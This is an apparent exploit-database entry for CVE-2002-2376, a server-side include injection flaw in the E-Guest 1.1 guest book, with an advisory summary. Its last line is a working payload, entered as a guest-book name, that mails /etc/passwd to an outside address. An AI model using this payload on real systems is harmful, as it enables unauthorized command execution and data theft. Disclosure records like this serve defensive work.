E-Guest 1.1 - Server Side Include Arbitrary Command Execution
| EKU-ID: 27091 | CVE: CVE-2002-2376;OSVDB-59507 | OSVDB-ID: |
| Author: DownBload | Published: 2002-06-30 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27091 | CVE: CVE-2002-2376;OSVDB-59507 | OSVDB-ID: |
| Author: DownBload | Published: 2002-06-30 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/5129/info E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems. E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host. Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->